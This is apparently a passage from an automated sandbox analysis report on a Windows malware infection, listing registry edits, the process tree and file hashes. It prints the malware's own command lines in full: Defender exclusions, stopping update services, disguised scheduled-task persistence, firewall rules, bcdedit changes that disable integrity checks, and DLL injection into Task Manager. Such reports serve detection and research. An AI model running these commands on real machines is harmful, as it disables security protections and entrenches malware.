| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-72 = "Newfoundland Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-791 = "SA Western Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = (binary blob omitted) | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = (binary blob omitted) | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = (binary blob omitted) | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = (binary blob omitted) | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = (binary blob omitted) | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = (binary blob omitted) | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\oneetx.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\oneetx.exe
"C:\Users\Admin\AppData\Local\Temp\oneetx.exe"
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "oneetx.exe" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "oneetx.exe" /P "Admin:R" /E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\207aa4515d" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\207aa4515d" /P "Admin:R" /E
C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe
"C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe"
C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe" & exit
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "setup.exe" /f
C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"
C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"
C:\Windows\system32\taskeng.exe
taskeng.exe {AD812B81-F212-47D8-B785-2640B8481481} S-1-5-21-3518257231-2980324860-1431329550-1000:VWMLZJGN\Admin:Interactive:[1]
C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe
"C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20230702001509.log C:\Windows\Logs\CBS\CbsPersist_20230702001509.cab
C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe
"C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\system32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Windows\system32\taskeng.exe
taskeng.exe {8750CB4D-8FD1-4C47-BEFF-24F4B57F29B4} S-1-5-18:NT AUTHORITY\System:Service:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
Network
Files
\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
| MD5 | a64a886a695ed5fb9273e73241fec2f7 |
| SHA1 | 363244ca05027c5beb938562df5b525a2428b405 |
| SHA256 | 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144 |
| SHA512 | 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474 |
C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe
| MD5 | 2d257873ee0ae75c9b89bd340e3e3da6 |
| SHA1 | 9dd9080df32b375f39df6470136a5bb107829eba |
| SHA256 | f6cf800d44ff24fc1d1c06ccb0df605c5585f56fd041d335a5fe15628a1e9428 |
| SHA512 | e89156f93c1ddb1292d31477e4d05937fc3a091a9868842f5cf861b9bea3c521c839cc557a8dcab0e3d651561b2d06392fcc9426278cd7797c2abeb6f5df5753 |
C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
| MD5 | 8670305fdaf49dc2fd18804bc8000bd2 |
| SHA1 | a1b57601e426f1c12a25251012c7ef2f3d1181e2 |
| SHA256 | f40cc09e6969d91062935094b84e5530ff17b140606f222e14755150688a5a34 |
| SHA512 | 9c4dc8036c8e85870d78f6c1cfe4176c62baf4e8bc6a0dc76eb217eb2a62aae6bac60a836ba7a8bdb1143d6ab889460ac140fa652450829a86f93048147735d1 |
C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
| MD5 | ebf830587e4df50f0a886fe4bf05bda0 |
| SHA1 | 3c0217098ca7b191d146b770eb366a9081187a66 |
| SHA256 | e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6 |
| SHA512 | a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074 |
C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe
| MD5 | e858e636547aa1dff328554f5750cb37 |
| SHA1 | a96483d7314414755ae9f89e389843ae35d3fece |
| SHA256 | 7a33f13cab7536657d3e8c34d5d59b6f4eec7b479f1e852fe675b518e4138222 |
| SHA512 | 4f95096a29614c6c3b9096fc75ea24aca2e92d619888094a942832d637df9dd55ae1eaa98df37cf3c3d57ad5d633267d019a29cf8f165f09ec4f647981656c30 |
C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe
| MD5 | 451af59f1dc7bf09eaad8c27aab0a8fe |
| SHA1 | a1e5d215d9e45937697d72e14d33476c6af4705c |
| SHA256 | 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606 |
| SHA512 | 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d |
| SHA512 | 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d |
memory/1676-314-0x0000000000810000-0x0000000000850000-memory.dmp
C:\Windows\rss\csrss.exe
| MD5 | 451af59f1dc7bf09eaad8c27aab0a8fe |
| SHA1 | a1e5d215d9e45937697d72e14d33476c6af4705c |
| SHA256 | 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606 |
| SHA512 | 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d |
\Windows\rss\csrss.exe
| MD5 | 451af59f1dc7bf09eaad8c27aab0a8fe |
| SHA1 | a1e5d215d9e45937697d72e14d33476c6af4705c |
| SHA256 | 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606 |
| SHA512 | 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d |
\Windows\rss\csrss.exe
| MD5 | 451af59f1dc7bf09eaad8c27aab0a8fe |
| SHA1 | a1e5d215d9e45937697d72e14d33476c6af4705c |
| SHA256 | 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606 |
| SHA512 | 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d |
memory/1248-326-0x0000000004EB0000-0x0000000004EF0000-memory.dmp
C:\Windows\rss\csrss.exe
| MD5 | 451af59f1dc7bf09eaad8c27aab0a8fe |
| SHA1 | a1e5d215d9e45937697d72e14d33476c6af4705c |
| SHA256 | 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606 |
| SHA512 | 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d |
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
| MD5 | 13aaafe14eb60d6a718230e82c671d57 |
| SHA1 | e039dd924d12f264521b8e689426fb7ca95a0a7b |
| SHA256 | f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3 |
| SHA512 | ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3 |
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
| MD5 | 13aaafe14eb60d6a718230e82c671d57 |
| SHA1 | e039dd924d12f264521b8e689426fb7ca95a0a7b |
| SHA256 | f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3 |
| SHA512 | ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3 |
memory/924-367-0x0000000140000000-0x00000001405E8000-memory.dmp
memory/956-368-0x0000000004AA0000-0x0000000004AE0000-memory.dmp
\Users\Admin\AppData\Local\Temp\dbghelp.dll
| MD5 | f0616fa8bc54ece07e3107057f74e4db |
| SHA1 | b33995c4f9a004b7d806c4bb36040ee844781fca |
| SHA256 | 6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026 |
| SHA512 | 15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c |
\Users\Admin\AppData\Local\Temp\symsrv.dll
| MD5 | 5c399d34d8dc01741269ff1f1aca7554 |
| SHA1 | e0ceed500d3cef5558f3f55d33ba9c3a709e8f55 |
